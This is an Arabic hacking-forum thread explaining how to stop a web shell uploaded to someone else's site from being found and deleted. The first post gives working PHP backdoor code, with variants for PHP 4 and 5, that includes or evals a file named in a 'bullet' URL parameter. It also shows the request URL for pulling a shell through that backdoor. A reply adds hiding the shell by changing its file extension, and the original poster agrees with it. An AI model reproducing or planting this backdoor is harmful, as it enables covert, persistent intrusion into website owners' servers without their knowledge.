السلام عليكم ورحمة الله وبركاته .. كيفكم ياحلوين ان شاء الله تمام .. أحيانا يتم رفع الشل ولكن تجيه ثاني يوم تحصله محذوف سواء من صاحب الموقع أو صاحب...

ارساوي

<font size="3" color="Red" face="Arial Black"><fon
حل مشكلة حذف الشل من صاحب الموقع
السلام عليكم ورحمة الله وبركاته ..

كيفكم ياحلوين ان شاء الله تمام ..

أحيانا يتم رفع الشل ولكن تجيه ثاني يوم تحصله محذوف سواء من صاحب الموقع أو صاحب السيرفر

ايش الحل ؟؟؟ نبي نرفع شل ونضمن بقاءه أطول فترة ممكنة بدون لفت نظر صاحب الموقع أو السيرفر..

الحل هو :

حقن كود بأحد ملفات الموقع [ ملاحظة : أنا قلت حقن مو تحذف كود الملف يعني مجرد اضافة للكود ]

هذا الكود معروف وهو يسبب ثغرة فايل انكلود للسيرفر ... بعد كذا تقوم بسحب الشل بصيغة txt

وهذا شي واضح للكل ...

للاصدار الرابع php 4


PHP:
<?php

$RxH = $_GET['bullet'];

include ($RxH);

?>

للاصدار الخامس php 5

PHP:
<?php
if($_GET[bullet]){
$file=implode("\n",file($_GET[bullet]));
$bullet=str_replace("<?php", "",$file);
$bullet=str_replace("<?", "",$bullet);
$bullet=str_replace("?>", "",$bullet);
eval($bullet);
}
?>


ملاحظة تأكد أولا من اصدار php واستعمل الكود المناسب ...

بالنسبة للاصدار الخامس نفرض وضعنا الكود في ملف وليكن اسمه sad.php

طريقة السحب كالتالي :



PHP:
www.site.com/sad.php?bullet=shell.txt?

اتمنى تكون الطريقة هذى مفيدة لحل لمشاكل حذف الشل ...
 

the sn!per

New Member
حل مشكلة حذف الشل من صاحب الموقع
[align=center][/align]مشكور اخ ارساوي عالموضوع الرائع
 

KaLa$nikoV

<b><font color="DarkRed" size="2">VBSPIDERS TEAM</
حل مشكلة حذف الشل من صاحب الموقع
مشكور ع الشرح يا غلا
بس بجب ازيد كلمه لو ممكن


عندك يفضل تطبق الثغره ع الموقع بعد ما تحقنها لانها مش دايما تنفع حتى الاصدار الخامس يرتبط الشل بس ما بتقدر ترفع ايا ملف


هون عندك حلول ثانيه باكواد الثغرات التانيه وكله هاد ارفقته بالدوره

لكن في طريقه لسا بعد ما ارففتها لانها مش معروفه ( من اكتشافي :$ )


لكن في كمان طريقه سهله وهي هتاكتتس تغير الامتداد

بنغير امتداد الشل من php الى مثلا cvo
وهيك ما رح يصيد الشل ولا يعرف ايش اهميتو بس لو دخل عليه راح يفتح معاه الشل وهاد اشي ما اتفقنا عليه :]
 

ارساوي

<font size="3" color="Red" face="Arial Black"><fon
حل مشكلة حذف الشل من صاحب الموقع
مشكور ع الشرح يا غلا
بس بجب ازيد كلمه لو ممكن


عندك يفضل تطبق الثغره ع الموقع بعد ما تحقنها لانها مش دايما تنفع حتى الاصدار الخامس يرتبط الشل بس ما بتقدر ترفع ايا ملف


هون عندك حلول ثانيه باكواد الثغرات التانيه وكله هاد ارفقته بالدوره

لكن في طريقه لسا بعد ما ارففتها لانها مش معروفه ( من اكتشافي :$ )


لكن في كمان طريقه سهله وهي هتاكتتس تغير الامتداد

بنغير امتداد الشل من php الى مثلا cvo
وهيك ما رح يصيد الشل ولا يعرف ايش اهميتو بس لو دخل عليه راح يفتح معاه الشل وهاد اشي ما اتفقنا عليه :]


كلام صحيح

ومنور يا قلبي
 
أعلى